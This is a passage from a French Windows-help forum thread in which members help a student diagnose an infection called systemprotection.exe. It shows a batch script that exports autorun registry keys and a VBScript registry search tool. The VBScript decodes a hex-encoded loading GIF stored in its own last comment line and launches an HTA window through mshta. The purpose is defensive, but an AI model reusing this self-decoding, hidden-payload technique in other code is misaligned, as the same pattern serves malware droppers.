E8E2135780C7A61A84BA1CF12000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF697208ADA48866699A2E30662AFCBC1B3CC4C9544DF8FD9F63EC1242804FA86C19C0592C3359931A533FA74109147E3CA1AC49AA4D01A78A7B395C7E62537BBDE02AEDA5F7B84AE57D353F11D0D9F9FFC45805E747B8554877A883C82717F6F5D8D818F3E768A678689998B936E7D9C729F8E44959A97966A78619B9EAC908C8005B1B20513B3B2B5B6B40FB9BA0EBCB8B6C0B31303C5C603C4C7C5C9CACCC7CEC6BFBBB9C2B7D3C1D7C3D9D6BED40FCACBDFE0D0E10EE0C8E2CAD2DDD8ECDAEEDC00EBF2DEF0B1E4E8E6E3E9CFFCC6F8F302D6A3D78EE03B83F1E69DC3C7D05F3900E7041694789062C2810B1DE683B84F2E5F338D16EF6D1369AF174292274D2AECC8F1A3C77E2FFF6944A8A120BC9A076F5EB049F3824B7F1A7EC60CFA2C010021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D370924A995E6850A27BA8118FC8A333355524CE316848F2BD623287410812BDEEDE793299B3BA6CE06A51A8348D710BB4D4A6B39706F1A7E92C7E2A5ECD8D55E57D992395D2D7FE7F8FB97FD7603F87F41794E7A848651875681706D2571297D728588948A8395766B5C91908B7E44979693A28999986880A99B9E2505AEAF0513B0AFB2B3B10FB6B70EB9B5B3BDB0BFB40F03C4C50313C6C5C8C9C7C3CCBCB8B6C1AED3BA00D0BBD2D1BEDBC0CEC9CBE0DFC6E1C6D8D7DAD9DCEADEECC2EED4DDEFE8EB00CCCD0EF7E5CAE3C5E7FFE9E8B513380F60BD73FAFA11DBB750E100830321160C28311E3C6B09F3316388CF27DE338A200F868C387262BD8C1EC5695499925C3D771A5E128C3910E605993259AE6CB84F03B8040021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D378193609ADA895EAAB091AF1833636541760DDB37B6E78FD6CA217405853C9D2C89FB3997401F14562C09AD2DA694D69C7AB95B49B8371397C9D5630BABD29E95E07737EEAE47E5C4AB5AC53ED99F74777F5F66837169796B7B7E828D80858E8464866688009645949391818F9B9E70957A897C8B2605A8A90513AAA9ACADAB0FB0B10EB3AFADB7AAB9AEB2B01303C0C103BFC2C0C4C5B6BDB8CABACCBCB5BECEA8BBD3D2B400C90EC5C60FDBC3DDDBD9D8D1D0CBE5CDE7CFE3E6EBE8EDEAE2DEC7C2F3C1E2F7E4EFD5E9FBFAD7F8ECE26DABC74D5BB87C00DD258487B061C07CF2C015233860613F8BFF1C2AD4C8901B5D44831325D263974E03C97726DD95BC70B2A54A0021EB699898000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D3781A3F80828AAA56A2561E416BB16E496F36DE7BCC9A6931F8A86331177461D2CD963149D48A84328080A8F4BA98CC9D562B75E25F835AE4D85D6DF772D6637C9EE2E5C4C4DB3E2E1B7B9FC9CEBFB7B5F7527576D867F517E7281878B7640846A8D798E898C88598A945A83673F05A0A10513A2A1A4A5A30FA8A90EABA7A5AFA2B1A6AAA8B3A01303BABB03B9BCBAAEB5B0C2B2C4B4ADB6C6B8CAAC00C1C8C3D0C50EBFBABEBFCFCEC9D2C7DAD1DED3E0DDD9E4DBE2CBD4D5D7BCE5DFEDE1EFE3E6F1E8E7CDD5BD0FF8F4CDFCB7FDF302BA13180EDFBA5DFE98FD5BA8B021B77A09D3FD3A68ED1B370D16C5610C77F10C42C68F1C355E9838921780040021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D3781A308998EA0AA1BD99A9584B9B175D27189EF70FEACC09AAEC7630C8D37A212395BCA5E4C0070254C46ABCDAB2FFBC442BBDBAF8D3B964E05DE74585D04B7CB6C67F98C5EDBDF47B73C0FBFEF7F67715A78567A837F647C8A805382868F7D8489859188621374059A9B05139C9B9E9F9D0FA2A30EA5A19FA99CABA0A4A2AD9AB1A60003B6B703A8AFAABBACBDAEA7B0BFB2C3B4BAC1BCC8BECAC0B5B8B6C700D1D3C2CCC4D6C6D5D2DAD4C9DBDECFD0DCE3DEDDCBDFE7E6CDEAD7E8CDE1B9E4E9F2EBF4EDECD9E5F6B4F0F8B3FFC5006213E8EEDEBE09F0DC69F0C66CE1B98617182A8CF870622B87CD1C3C0390000021F904090A0000002C0000000080000F000003E708B40BFEAC3D17C9A4F1AA7CABF61D3781A3089918B391AB5949A9FB96EC6B9DF58CCBB9DDF340D54E1823B68C365A107664FA744527B4798B56A94AE4343994FE9E57AE35EB5D86B7E86F590B5EBBCF6AB8992C67CFBB3EBA1EBF1FF3FF7E81587862838285886977878A760C059091051392919495930F98990E9B97959F92A1969A98A390A79C009B9EA5A0AEA2B0A49DA6B2A8B6AAADB4AFBBB1BDB3ABACBCC1C3BAC4BEC7C0C6CBB5BFB7CEB9CDC9C2A9D5B8D6D0D8D3D1C5D2CCC2CADEE2DDE4C8DFE6E3E8E5E0DAE7E1EBCFDBEDE9EFEAA2C3BF1AF8C9FAC8F917FB02FAE3077020A804003B000000000000000000
    Répondre avec citation Répondre avec citation   0  0
  14. 18/09/2013, 12h36 #14
    ledouxxx
    ledouxxx est déconnecté
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2013
    Messages
    10
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Santé

    Informations forums :
    Inscription : Août 2013
    Messages : 10
    Points : 5
    Points
    5
    Par défaut
    Citation Envoyé par Benjîle Voir le message
    voilà le script à exécuter:

    poster en PJ le fichier c:\cle\sortie.txt

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    mkdir c:\cle

regedit /e c:\cle\outputwinlogon.reg HKEY_LOCAL_MACHINE\software\microsoft\windows nt\current version\winlogon
regedit /e c:\cle\outputrun.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
regedit /e c:\cle\outputrunonce.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
regedit /e c:\cle\outputrunservice.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
regedit /e c:\cle\outputrunservicesonce.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
regedit /e c:\cle\outputuserrun.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
regedit /e c:\cle\outputuserrunonce.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
regedit /e c:\cle\outputuserrunservice.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
regedit /e c:\cle\outputuserrunserviceonce.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
regedit /e c:\cle\output.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\
regedit /e c:\cle\outputlogon.reg HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Scripts\Logon
regedit /e c:\cle\outputuserlogon.reg HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Scripts\Logon
regedit /e c:\cle\outputexplorershellfolders.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
regedit /e c:\cle\outputuserexplorer.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
regedit /e c:\cle\outputshellfolders.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
regedit /e c:\cle\outputusershellfolders.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell Folders
regedit /e c:\cle\outputwinlogonshell.reg HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
regedit /e c:\cle\outputsystemshell.reg HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\Shell
regedit /e c:\cle\outputservices.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

type c:\cle\*.reg > c:\cle\sortie.txt

del c:\cle\*.reg
    à mettre dans un fichier texte (bloc note), l'enregistrer sous le nom exporte.cmd et l'exécuter


    @hackoofr, je ne suis pas sûr de bien comprendre votre remarque masi en gros comprendre le système windows est bien plus efficace que d'utiliser 40 utilitaires que l'on ne comprend pas et qui ne font pas le travail
    Si un jour un de vos serveurs se fait infecter, croyez moi vous ne lancerez pas ces utilitaires...
    Salut Ben
    je viens d'executer le script ci dessus et au cours de son exécution il y a eu des messages d'erreur du genre "disk or file system error" et après, le fichier c:\cle\sortie.txt eswt introuvable, je pense qu'il ne s'est pas créé.
    Merci pour tous les efforts que vous faites.
    Répondre avec citation Répondre avec citation   0  0
  15. 18/09/2013, 13h20 #15
    BenjGe
    BenjGe est déconnecté
    Membre expérimenté
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    Avril 2008
    Messages
    875
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : Avril 2008
    Messages : 875
    Points : 1 394
    Points
    1 394
    Par défaut
    il doit être exécuté comme administrateur
    sinon à la place de c:\cle mets un dossier quelconque auquel tu as accès

    vérifie que tu peux lancer l'outil regedit aussi, car ton script en empêchait l'accès mais un des utilitaires de hackoofr semble l'avoir rétabli

    sinon suis les scripts d'hackoofr il est sur la bonne piste
    Répondre avec citation Répondre avec citation   1  0
  16. 18/09/2013, 13h53 #16
    ledouxxx
    ledouxxx est déconnecté
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2013
    Messages
    10
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Santé

    Informations forums :
    Inscription : Août 2013
    Messages : 10
    Points : 5
    Points
    5
    Par défaut Recherche de Systemprotection.exe
    Citation Envoyé par hackoofr Voir le message

    Voila j'ai un peu modifié et traduit en français ce Vbscript (Version Originale en anglais par © Bill James)
    Description du Script :
    • Rechercher dans votre base de Registre et trouver toutes les instances du mot saisi.
    • Possibilité de sauvegarder le résultat de recherche avec WordPad.
    • On peut aussi sauvegarder le fichier avec l'extension ".reg", pour l'utiliser afin de restaurer chaque changement de la base de registre que vous faites pour ces valeurs.
    • Ajout d'une barre de Progression en Vbscript + HTA par © Hackoo le 14/09/2013

    Copier et coller ce code et enregistrer-le sous le nom RegSearch.vbs, puis exécuter-le et poster son contenu.
    J'ai prédéfini le mot à rechercher comme systemprotection.exe
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    'Rechercher dans votre base de Registre et trouver toutes les instances du mot saisi.
'Possibilité de sauvegarder le résultat de recherche avec WordPad.
'On peut aussi sauvegarder le fichier avec l'extension ".reg", pour l'utiliser afin de restaurer chaque changement de la base de registre que vous faites pour ces valeurs.
'Ajout d'une barre de Progression en Vbscript + HTA par © Hackoo le 14/09/2013 
Option Explicit
Dim oExec,ws,Temp,Titre,MsgAttente
Set ws = CreateObject("wscript.Shell") 
Temp = WS.ExpandEnvironmentStrings("%Temp%")

Sub CreateProgressBar(Titre,MsgAttente)
	Dim ws,fso,f,f2,ts,ts2,Ligne,i,fread,LireTout,NbLigneTotal,Temp,PathOutPutHTML,fhta,oExec
	Set ws = CreateObject("wscript.Shell")
	Set fso = CreateObject("Scripting.FileSystemObject")
	Set f = fso.GetFile(WScript.ScriptFullName)
	Set ts = f.OpenAsTextStream(1,-2)
	Set fread = Fso.OpenTextFile(f,1)
	LireTout = fread.ReadAll
	NbLigneTotal = fread.Line 
	Temp = WS.ExpandEnvironmentStrings("%Temp%")
	PathOutPutHTML = Temp & "\Barre.hta"
	Set fhta = fso.OpenTextFile(PathOutPutHTML,2,True)
	fso.CreateTextFile Temp & "\loader.gif"
	Set f2 = fso.GetFile(Temp & "\loader.gif")
	Set ts2 = f2.OpenAsTextStream(2,-2)
	for i=1 to NbLigneTotal - 1
		ts.skipline
	Next
	Do
		Ligne = ts.readline
		For i=2 to Len(Ligne) step 2
			ts2.write chr( "&h" & mid(Ligne,i,2))
		Next
	loop until ts.AtEndOfStream
	ts.Close
	ts2.Close
	fhta.WriteLine "<HTML>"
	fhta.WriteLine "<HEAD>" 
	fhta.WriteLine "<Title>" & Titre & "</Title>" 
	fhta.WriteLine "<HTA:APPLICATION"
	fhta.WriteLine "ICON = ""Regedit.exe"" "
	fhta.WriteLine "BORDER=""THIN"" "
	fhta.WriteLine "INNERBORDER=""NO"" "
	fhta.WriteLine "MAXIMIZEBUTTON=""NO"" "
	fhta.WriteLine "MINIMIZEBUTTON=""NO"" "
	fhta.WriteLine "SCROLL=""NO"" "
	fhta.WriteLine "SYSMENU=""NO"" "
	fhta.WriteLine "SELECTION=""NO"" " 
	fhta.WriteLine "SINGLEINSTANCE=""YES"">"
	fhta.WriteLine "</HEAD>" 
	fhta.WriteLine "<BODY text=""white""><CENTER><DIV><SPAN ID=""ProgressBar""></SPAN>"
	fhta.WriteLine "<span><marquee DIRECTION=""LEFT"" SCROLLAMOUNT=""3"" BEHAVIOR=ALTERNATE><font face=""Comic sans MS"">" & MsgAttente &" "& Titre & "</font></marquee></span></DIV></CENTER></BODY></HTML>"
	fhta.WriteLine "<SCRIPT LANGUAGE=""VBScript""> "
	fhta.WriteLine "Set ws = CreateObject(""wscript.Shell"")"
	fhta.WriteLine "Temp = WS.ExpandEnvironmentStrings(""%Temp%"")"
	fhta.WriteLine "Sub window_onload()"
	fhta.WriteLine "    CenterWindow 320,90"
	fhta.WriteLine "    Self.document.bgColor = ""Red"" "
	fhta.WriteLine "    image = ""<center><img src= "& Temp & "\loader.gif></center>"" "
	fhta.WriteLine "    ProgressBar.InnerHTML = image"
	fhta.WriteLine " End Sub"
	fhta.WriteLine " Sub CenterWindow(x,y)"
	fhta.WriteLine "    Dim iLeft,itop"
	fhta.WriteLine "    window.resizeTo x,y"
	fhta.WriteLine "    iLeft = window.screen.availWidth/2 - x/2"
	fhta.WriteLine "    itop = window.screen.availHeight/2 - y/2"
	fhta.WriteLine "    window.moveTo ileft,itop"
	fhta.WriteLine "End Sub"
	fhta.WriteLine "</script>"
End Sub

Sub LancerProgressBar()
	Set oExec = Ws.Exec("mshta.exe " & Temp & "\Barre.hta")'Lançer la barre de Progression
End Sub

Sub FermerProgressBar()
	oExec.Terminate
End Sub
'***************************************************Programme Principal****************************************************************************
'--------------------------------RegSrch-------------------------------------------------------------------------------------------
'RegSrch.vbs - Search Registry for input string and display results.
'© Bill James - wgjames@mvps.org
' revised 20 Apr 2001 (parses regfile ~3X faster)
' revised 13 Dec 2001 (added Regedit command line switch for Win2K/WindXP)
'----------------------------------------------------------------------------------------------------------------------------------
Dim oWS : Set oWS = CreateObject("WScript.Shell")
Dim oFSO : Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim sSearchFor
sSearchFor = InputBox("Ce programme va rechercher dans votre base de registre et trouver toutes " & _
"les instances du mot saisi." & vbcrlf & vbcrlf & _
"Cette recherche peut prendre plusieurs minutes, alors il faut être patient." & _
vbcrlf & vbcrlf & "Entrez le mot à rechercher " & _
"cliquer OK...", WScript.ScriptName & " " & Chr(169) & " Hackoo Crackoo","systemprotection.exe")
If sSearchFor = "" Then Cleanup()
Titre = "Recherche dans la base de registre © Hackoo"
MsgAttente = "Veuillez patienter... La Recherche du mot "& DblQuote(sSearchFor) &" est en cours..."
Call CreateProgressBar(Titre,MsgAttente)
Call LancerProgressBar()
Dim StartTime : StartTime = Timer
Dim sRegTmp, sOutTmp, eRegLine, iCnt, sRegKey, aRegFileLines
sRegTmp = oWS.Environment("Process")("Temp") & "\RegTmp.tmp "
sOutTmp = oWS.Environment("Process")("Temp") & "\sOutTmp" & _
Hour(Now) & Minute(Now) & Second(Now) & ".tmp "
oWS.Run "regedit /e /a " & sRegTmp, , True '/a enables export as Ansi for WinXP
With oFSO.OpenTextFile(sOutTmp, 8, True)
	.WriteLine("REGEDIT4" & vbcrlf & "; " & WScript.ScriptName & " " & _
	Chr(169) & " Hackoo Crackoo" & vbcrlf & vbcrlf & "; Résultat de la Recherche pour le " & _
	"mot " & Chr(34) & sSearchFor & Chr(34) & " " & Now & _
	vbcrlf & vbcrlf & "; NOTE: Ce fichier va être supprimer si vous ne le sauvegarder pas avec " & _
	"WordPad." & vbcrlf & "; Vous avez interêt de le sauvgarder vers un nouveau " & _
	"emplaçement si vous-voulez l'utiliser aprés." & vbcrlf & "; (si " & _
	"vous sauvegarder le fichier avec l'extension .reg , Vous Pouvez l'utiliser pour restaurer " & _
	"afin de restaurer chaque changement de la base de registre que vous faites pour ces valeurs..)" & vbcrlf)
'---------------------------------------------------------------------------------------------------------------------------------------------------------------
'ForReading 1 Ouvre un fichier en lecture seule. Vous ne pouvez écrire dans ce fichier.
'ForWriting 2 Ouvre un fichier en mode écriture. Si un fichier portant le même nom existe, son contenu antérieur est écrasé.
'ForAppending 8 Ouvre un fichier et écrit à  la fin de celui- ci.
'TristateUseDefault -2 Ouvre le fichier en utilisant le paramètre système par défaut.
'TristateTrue -1 Ouvre le fichier au format Unicode.
'TristateFalse 0 Ouvre le fichier au format ASCII.
'OpenAsTextStream(1, 0) donc est ouvert en lecture seule et au format ASCII
'-------------------------------------------------------------------------------------------------------------------------------------------------------------
	With oFSO.GetFile(sRegTmp)
		aRegFileLines = Split(.OpenAsTextStream(1,0).Read(.Size), vbcrlf)
	End With
'oWS.Run "WordPad " & sRegTmp, 3, True
	oFSO.DeleteFile(sRegTmp)
'-----------------------------------------------------------------------------------------------------------------------------------------------------------------
'Exemple comment utiliser la Fonction Instr
'Dim SearchString, SearchChar, MyPos
'SearchString ="XXpXXpXXPXXP" ' Chaîne dans laquelle rechercher.
'SearchChar = "P" ' Recherche "P".
'MyPos = Instr(4, SearchString, SearchChar, 1) ' Comparaison textuelle commençant à  la position 4. Renvoie 6.
'MyPos = Instr(SearchString, SearchChar) ' La comparaison est binaire par défaut (le dernier argument est omis). Renvoie 9.
'MyPos = Instr(1, SearchString, "W") ' Comparaison binaire commençant à  la position 1. Renvoie 0 ("W" est introuvable).
'-----------------------------------------------------------------------------------------------------------------------------------------------------------------
	For Each eRegLine in aRegFileLines
		If InStr(1, eRegLine, "[", 1) > 0 Then sRegKey = eRegLine
		If InStr(1, eRegLine, sSearchFor, 1) > 0 Then
			If sRegKey <> eRegLine Then
				.WriteLine(vbcrlf & sRegKey) & vbcrlf & eRegLine
			Else
				.WriteLine(vbcrlf & sRegKey)
			End If
			iCnt = iCnt + 1
		End If
	Next
	Erase aRegFileLines
	If iCnt < 1 Then
'Fermeture de la fenêtre d'attente (La barre de progression)
		Call FermerProgressBar()
		oWS.Popup "Recherche complétée dans " & FormatNumber(Timer - StartTime, 0) & " seconds." & _
		vbcrlf & vbcrlf & "Pas instances de " & chr(34) & sSearchFor & chr(34) & _
		" Trouvé.",, WScript.ScriptName & " " & Chr(169) & " Hackoo Crackoo",48
		.Close
		oFSO.DeleteFile(sOutTmp)
		Cleanup()
	End If
	.Close
End With
'Fermeture de la fenêtre d'attente (La barre de progression)
Call FermerProgressBar()
oWS.Popup "Recherche complétée dans " & FormatNumber(Timer - StartTime, 0) & " seconds." & _
vbcrlf & vbcrlf & iCnt & " instances de " & chr(34) & sSearchFor & chr(34) & _
" Trouvé." & vbcrlf & vbcrlf & "Cliquer sur OK pour ouvrir les Résultas dans WordPad.",, _
WScript.ScriptName & " " & Chr(169) & " Hackoo Crackoo",64
oWS.Run "WordPad " & sOutTmp, 3, True
oFSO.DeleteFile(sOutTmp) 

Sub Cleanup()
	Set oWS = Nothing
	Set oFSO = Nothing
	WScript.Quit
End Sub
'**********************************************************************************************
'Fonction pour ajouter les doubles quotes dans une variable
Function DblQuote(Str)
	DblQuote = Chr(34) & Str & Chr(34)
End Function
'****************************************************Fin du Programme Principal***********************************************************************
'47494638396180000F00F20000F3D9DDF15279F2BBC6F2B0BEF17492F1527900000000000021FF0B4E45545343415045322E30030100000021FE1A43726561746564207769746820616A61786C6F61642E696E666F0021F904090A0000002C0000000080000F000003E708B20BFEAC3D17C5A4F1AA7CABF61D3781A3089918B391AB5949A9FB96EC6B9DF58CCBB9DDF340D54E1823B68C365A107664FA744527B4798B56A94AE4343994FE9E57AE35EB5D86B7E86F590B5EBBCF6AB8992C67CFBB3EBA1EBF1FF3FF7E81587862838285886977878A760C039091031392919495930F98990E9B97959F92A1969A98A390A79C009B9EA5A0AEA2B0A49DA6B2A8B6AAADB4AFBBB1BDB3ABACBCC1C3BAC4BEC7C0C6CBB5BFB7CEB9CDC9C2A9D5B8D6D0D8D3D1C5D2CCC2CADEE2DDE4C8DFE6E3E8E5E0DAE7E1EBCFDBEDE9EFEAA2C3BF1AF8C9FAC8F917FB02FAE3077020A8040021F904090A0000002C0000000080000F000003FF08B40BFE22C607A5A0CE5EAC31E89CE581145949A318A24C5B6A5B06BF261C7FF3A9CA75CEEFB89EA6C5A0016D46944EF963068FBEA713B99C5405C4C635696D76A55FAAF7260693A3655B96C03D0BA1EF297A1E0FD32DEBB67ECB1FEFFD7D667F667981697772756E708C898D11858092828688768A83871A059C9D051403A1A203A0A3A1A5A6A8A3AAA2ACA70FA6AF0EB1A4B0B1AEB5B3B19E9DB8BEB6A9C0ABC2ADC4B200B4BFBAC1CBC3CDA2BC9CCAC8B7C6B9D4CCD8CEDAC5CFC7C9D6D3B4D19FE1E6DED7E0E8E2D5EBE7DCDFBBD1ECD9EAF0E9EDF7F4DBF6FDF2BCFBBAE97BE7AF5EBE82FC0EDE028821DB330F0EB941DCF6B021458916055664052001010021F904090A0000002C0000000080000F000003FF08B40BFEAC3D276A9DD40A0CF4C61E17829A58929699A257C44CAE948DF359AFF7F5787AFEF913DEAFC30BF2620458CC482336854C9B530ADD15ADCFAB0FA974457153701588A56AC33DF470ACE6429665F1994D9FDBB378B3C7EDE0ABBF697579728381777A1A7E7E8288848D86856B878E168A7064987F71908F9291809E1A05A3A40513A5A41303ABAC03AAADABAFB0B2ADB4ACB6B10FB0B90EBBAEBABBB803A8A3A7C4C2C8C0B3CAB5CCB7CEBC00BEC9BDC1D0C3C70FC4A6D7D4D2D6D5CBE1CDE3CFE5D1D3DDD7DBC6A8DEE9E7BFF1EFE0DFE2F6E4F8E6FAABECDAD9F3D4051CC84F5E417AF7E015F4E780E141810F092A9C588F62C260EE3064B4C5E10F5EB98EF93E62F0A80FE43E911C13000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C97422E70BF4BE9EC085A3576AE73791A05949D43BBDD613AADDBDEA368FF939D64F1834F542B4990CB21C1A9DA8E3B31885E26E2269957ABD2599156558DB25627766E0999CB5B6B9826F6C3C8FA0A76BF77D9B87EFCB785E4D0A83727E6C7F6F7D8B6A8D6948859174877A88969598949A58869D838C8F81A17C8EA2A61A05A9AA0513ABAAADAEAC0F03B4B50313B6B5B8B9B7B3BCBBB9C0B6C2BABEC1C6B6B1B20ECAB0AEC4B4D0BD0EBCD300D5D2D9C8C5D4BFDBB4CD0FE1CCB1DADDC7E7C3DFD6D8EBE6D7DEE9B5E300F4F4EDF2D1EEFBF9ECF1F0E800AAEB67AF9C3883FDDEE113C88DA1BE84FC1CFACB55F0D9418B10334A54F86F1AA1C78EBF305E4CC541A43C0E014F5E48C910E5C06D2E1B9E4C000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F102C1B9EEDE050A1F587667388D2959495835BD16F4AE23F9E4BAC3E3AC5D0E6812067D39DAEC66933533C622F2B8194651575595FACB0A944FC6D219834EA55B74F78C656BD7E9769C032E8BC33005D3DD9BF7E180567C44723C757A6488668A77835E846F827E907F92867B8C798787815C969F9EA16A49989BA5989DA3A285A0AAAE1D05B1B20513B3B2B5B6B40FB9BA0E03BFC00313C1C0C3C4C20FC7C8BEC7C6C4CEC1D0C0BCB8B6D5B3D7B7C9CDDBCFDDD1DFC5E1BFD2E4E3CB00CAD4BBB9D9B1EEBDE9DCCCDEF4E0F6E2F8E6FAE8CAE503EB1C04043070A0BF73FF12225CC8EF5FC176ECAC45C4C6505E3D8BF730E6D3B88F2B63BF791E1F4A140891E4488F0A1B563CA8B225CA9326DF5D804990A2340D17F1E1CCA8F3424E8D3B8B25000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7C85F7DA07766258929F99A2602561D5E45A902BDB8FB83AFAC8F7939E2008CC157FBAD92D5663C2384F0651373D21AD006175973D7693B8E86BE32443CD5223558DD5B2B9EE2BBCA76C9EEB625A7EEBFBB6BD717E736B721E786863878A61827D818F8091848D028B6596778C90939B7F9C922298697B76A3887A947C436F8EA0839E2205B2B30513B4B3B6B7B50FBABB0EBD1303C2C303C1C4C2C6C7C9C4CBC3CDC80FC7C2C0BCBAB9B7D7B4D9B8D1D2CFC5DDCAE1CCE3CEE5D00ED203D4BFD6D5D8EFDAF1DCE9DEE7E0F5E2F9E4FBE6FDE800D4B10330B0A0BB76F0FEE10B684FE1B787F7BE194C48F060458A03D5417418B12D23478513E52114799164C6860CF5A5E4B7D25F4B801A23521CE96B9E8699256BF6D3A072E7859E2D79B2DC99000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CAB1620F885C2189AE245962AB9795065C53056BF9C9D036BEAF4AC5F6F02240E1F40D94CC798289D32E8ED893C0A57466C557B756D4954A644BCC43569BB30CFBAE6B6BDDDD3571E07A9EF51F4992CDD15E73E6F7482817F75027853797C7A63668E8684419259709480888B8F6589699A6A91A16CA26E499FA78AA99E37A496AD83AF2005B3B40513B5B4B7B8B60FBBBC0EBEBAB81303C5C603C4C7C5C9CACCC7CEC6D0C5C1BDBBC2B5D7B9D5C3DBD80FCACBDFE0D2C8E2CDE6CFE8C6D4C0D6DDDAEDDCF1DEF3F000E0E50EF8E4FCEAE1FAE0D8011048D05DBD59D910FACB776FDCC27E00CF453C5650DE4083172D56A4D7503362C77413A33D1C19721AC68DF6502A3CF8EBA3C8920CF79174F98F26328BF534E0CCB8F29D4E8E2135780C7A61A84BA1CF12000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF697208ADA48866699A2E30662AFCBC1B3CC4C9544DF8FD9F63EC1242804FA86C19C0592C3359931A533FA74109147E3CA1AC49AA4D01A78A7B395C7E62537BBDE02AEDA5F7B84AE57D353F11D0D9F9FFC45805E747B8554877A883C82717F6F5D8D818F3E768A678689998B936E7D9C729F8E44959A97966A78619B9EAC908C8005B1B20513B3B2B5B6B40FB9BA0EBCB8B6C0B31303C5C603C4C7C5C9CACCC7CEC6BFBBB9C2B7D3C1D7C3D9D6BED40FCACBDFE0D0E10EE0C8E2CAD2DDD8ECDAEEDC00EBF2DEF0B1E4E8E6E3E9CFFCC6F8F302D6A3D78EE03B83F1E69DC3C7D05F3900E7041694789062C2810B1DE683B84F2E5F338D16EF6D1369AF174292274D2AECC8F1A3C77E2FFF6944A8A120BC9A076F5EB049F3824B7F1A7EC60CFA2C010021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D370924A995E6850A27BA8118FC8A333355524CE316848F2BD623287410812BDEEDE793299B3BA6CE06A51A8348D710BB4D4A6B39706F1A7E92C7E2A5ECD8D55E57D992395D2D7FE7F8FB97FD7603F87F41794E7A848651875681706D2571297D728588948A8395766B5C91908B7E44979693A28999986880A99B9E2505AEAF0513B0AFB2B3B10FB6B70EB9B5B3BDB0BFB40F03C4C50313C6C5C8C9C7C3CCBCB8B6C1AED3BA00D0BBD2D1BEDBC0CEC9CBE0DFC6E1C6D8D7DAD9DCEADEECC2EED4DDEFE8EB00CCCD0EF7E5CAE3C5E7FFE9E8B513380F60BD73FAFA11DBB750E100830321160C28311E3C6B09F3316388CF27DE338A200F868C387262BD8C1EC5695499925C3D771A5E128C3910E605993259AE6CB84F03B8040021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D378193609ADA895EAAB091AF1833636541760DDB37B6E78FD6CA217405853C9D2C89FB3997401F14562C09AD2DA694D69C7AB95B49B8371397C9D5630BABD29E95E07737EEAE47E5C4AB5AC53ED99F74777F5F66837169796B7B7E828D80858E8464866688009645949391818F9B9E70957A897C8B2605A8A90513AAA9ACADAB0FB0B